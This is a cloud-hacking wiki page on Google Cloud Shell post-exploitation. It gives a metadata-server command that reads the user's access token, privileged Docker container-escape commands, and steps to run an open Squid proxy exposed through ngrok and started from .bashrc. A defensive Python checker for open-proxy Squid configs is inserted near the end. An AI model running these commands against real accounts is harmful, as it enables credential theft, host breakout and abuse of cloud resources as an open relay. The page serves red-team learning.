GCP - Cloud Shell Post Exploitation

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

## Cloud Shell

For more information about Cloud Shell check:

GCP - Cloud Shell Enum

### Get the user's token from the metadata

Just by contacting the metadata server you can get an access token as the currently logged-in user:

```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
```

### Container Escape / Docker use

Warning

Previously, cloud shell was running inside a container with access to the host's docker socket. Google has since changed the architecture, and the cloud shell container now runs a "Docker in a container" design. So even though it is still possible to use docker from cloud shell, you won't be able to escape to the host through the docker socket. Note that the docker.sock file used to be mounted at /google/host/var/run/docker.sock, but it has now been moved to /run/docker.sock.

<details>

<summary>Docker use / Old container escape commands</summary>

```bash
sudo docker -H unix:///run/docker.sock pull alpine:latest
sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///run/docker.sock start escaper
sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh
```

</details>

Moreover, in the past it was also possible to obtain a token for the service account used by the cloud shell VM from the metadata server:

<details>

<summary>Old service account from metadata</summary>

```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
```

With the following scopes:

```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
```

</details>



### Use as a Proxy

If you want to use your google cloud shell instance as a proxy you need to run the following commands (or put them in the .bashrc file):

<details>

<summary>Install Squid proxy</summary>

```bash
sudo apt install -y squid
```

</details>

For reference, Squid is an http proxy server. Create a squid.conf file with the following configuration:

<details>

<summary>Create the squid.conf file</summary>

```bash
http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all
```

</details>

Copy the squid.conf file to /etc/squid:

<details>

<summary>Copy the config to /etc/squid</summary>

```bash
sudo cp squid.conf /etc/squid
```

</details>

Finally, start the squid service:

<details>

<summary>Start the squid service</summary>

```bash
sudo service squid start
```

</details>

Use ngrok to make the proxy reachable from outside:

<details>

<summary>Expose the proxy with ngrok</summary>

```bash
./ngrok tcp 3128
```

</details>

After running it, copy the tcp:// URL. If you want to use the proxy from a browser, it is recommended to drop the tcp:// prefix and the port, and then enter the port in the port field of your browser's proxy settings (squid is an http proxy server).

So that everything comes up automatically at startup, the .bashrc file should contain the following lines:

<details>

<summary>Add to .bashrc for automatic startup</summary>

```bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128
```

</details>
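The squid.conf above (`acl all src 0.0.0.0/0` plus `http_access allow all`) turns the Cloud Shell into an open relay for anyone who reaches the ngrok endpoint. As an added defender-side check, not code from the original page or the linked repository, the following Python script parses a squid.conf, flags every `http_access allow` rule that any client source satisfies, and contrasts the page's config with a constructed restricted one that only serves one network. The sample configs and the `localnet` acl name are constructed for the example.

```python
import ipaddress

# Constructed samples (not from the page): OPEN_CONF mirrors the squid.conf above.
OPEN_CONF = """http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all
"""
RESTRICTED_CONF = """http_port 127.0.0.1:3128
acl localnet src 10.0.0.0/8
http_access allow localnet
http_access deny all
"""

def parse_squid_conf(text: str) -> tuple[dict[str, list[str]], list[tuple[str, list[str]]]]:
    """Collect 'acl NAME src ...' networks and the ordered http_access rules."""
    acls: dict[str, list[str]] = {"all": ["0.0.0.0/0"]}  # Squid predefines 'all'
    rules: list[tuple[str, list[str]]] = []
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split()  # strip comments, tokenize
        if len(parts) >= 4 and parts[0] == "acl" and parts[2] == "src":
            acls.setdefault(parts[1], []).extend(parts[3:])
        elif len(parts) >= 2 and parts[0] == "http_access":
            rules.append((parts[1], parts[2:]))
    return acls, rules

def is_catch_all(network: str) -> bool:
    """True for a prefix that matches every address (0.0.0.0/0, ::/0, ...)."""
    try:
        return ipaddress.ip_network(network, strict=False).prefixlen == 0
    except ValueError:
        return False  # hostnames or ranges like 10.0.0.1-10.0.0.9 are not catch-all

def open_proxy_findings(text: str) -> list[str]:
    """Return each http_access allow rule that every client source satisfies.
    A rule fires only when all its acls match, so it is flagged only when every
    (non-negated) acl on it is a catch-all src acl; scanning stops at a catch-all deny."""
    acls, rules = parse_squid_conf(text)
    findings: list[str] = []
    for action, names in rules:
        unrestricted = bool(names) and all(
            not n.startswith("!") and any(is_catch_all(x) for x in acls.get(n, []))
            for n in names)
        if not unrestricted:
            continue
        if action == "allow":
            findings.append("http_access allow " + " ".join(names))
        elif action == "deny":
            break  # later rules are unreachable once everything is denied
    return findings
```

Run it over `/etc/squid/squid.conf` on a host you administer; a non-empty result means the proxy will relay for any source that can reach the listening port.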

Instructions taken from https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Check that page for other crazy ideas for running any kind of software (databases and even windows) inside Cloud Shell.
